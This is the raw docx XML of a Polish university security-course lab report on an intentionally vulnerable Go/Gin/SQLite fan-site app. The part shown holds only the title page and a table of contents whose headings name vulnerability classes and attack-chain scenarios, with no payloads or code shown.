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MikuMiku Fan Hub - podatności jako funkcjonalności aplikacji</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Przedmiot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bezpieczeństwo Aplikacji Internetowych  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Uczelnia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Politechnika Świętokrzyska w Kielcach  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Projekt:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikacja laboratoryjna Go/Gin/SQLite z trybem vulnerable/secure  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Autorzy:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mateusz Misiak, Kamil Erbel  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Grupa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1IZ21B  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Charakter pracy:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> projekt laboratoryjny z bezpieczeństwa aplikacji internetowych  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data finalizacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2026-05-30  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="1" w:name="sec1"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Spis treści</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="sec2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">1. Spis materiałów dokumentacyjnych </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec2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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">2. Streszczenie </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec3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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">3. Cel i charakter projektu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec4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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">4. Zakres etyczny i środowisko testowe </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec5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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">5. Wdrożona funkcjonalność aplikacji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec6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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6. Organizacja pracy i odpowiedzialność </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec7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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7. Architektura funkcjonalna </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec8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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">8. Mapa funkcji i podatności </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec9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10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9. Dokumentacja ekranów i poprawne użycie aplikacji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec10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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.1. Fan posts </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec11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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.2. Vocaloid library search </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec12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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.3. Security map </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec13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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.4. Member directory </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec14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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.5. Fanart vault preview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sec15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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.6. Stream relay health check </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec16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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.7. Profile notification settings </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec17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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">9.8. Moderation queue </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec18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19">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">10. Scenariusze podatności </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec19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20">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11. Rozszerzone przebiegi ataków na faktycznych funkcjach </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec20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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.1. A. SQL Injection w wyszukiwarce Vocaloid library </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec21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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.2. Atak z użyciem narzędzia zewnętrznego </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec22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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.3. B. Stored XSS w komentarzach fan postów </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec23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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.4. C. CSRF w ustawieniach profilu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec24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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.5. D. IDOR/Broken Access Control w kolejce moderacyjnej </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec25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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.6. E. Sensitive Data Exposure w katalogu członków </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec26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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.7. F. Path Traversal w Fanart vault </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec27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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.8. G. Command Injection w Stream relay check </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec28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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">11.9. H. Broken Authentication w logowaniu użytkownika </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec29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30">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12. Scenariusze złożone do weryfikacji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec30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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.1. Łańcuch 1 - SQLi jako panel rozpoznania bazy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec31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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.2. Łańcuch 2 - słabe logowanie + IDOR </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec32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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.3. Łańcuch 3 - Stored XSS jako przejęcie interfejsu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec33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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.4. Łańcuch 4 - Path Traversal + rozpoznanie kodu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec34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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.5. Łańcuch 5 - Command Injection jako mini-rekonesans systemu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec35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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.6. 1. SQL Injection w Vocaloid library </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec36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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.7. 2. Stored XSS w komentarzach fan postów </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec37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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.8. 3. Broken Authentication w logowaniu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec38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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.9. 4. IDOR w kolejce moderacyjnej </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec39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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.10. 5. CSRF w ustawieniach profilu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec40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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.11. 6. Sensitive Data Exposure w member directory </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec41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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.12. 7. Path Traversal w fanart vault </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec42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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">12.13. 8. Command Injection w stream relay check </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec43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44">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">13. Fragmenty kodu implementacji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec44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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">13.1. Routing feature-first </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec45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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">13.2. Nawigacja aplikacji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sec46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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">13.3. Fanart vault jako realna funkcja </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec47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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">13.4. Stream check jako realna funkcja </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec48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49">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
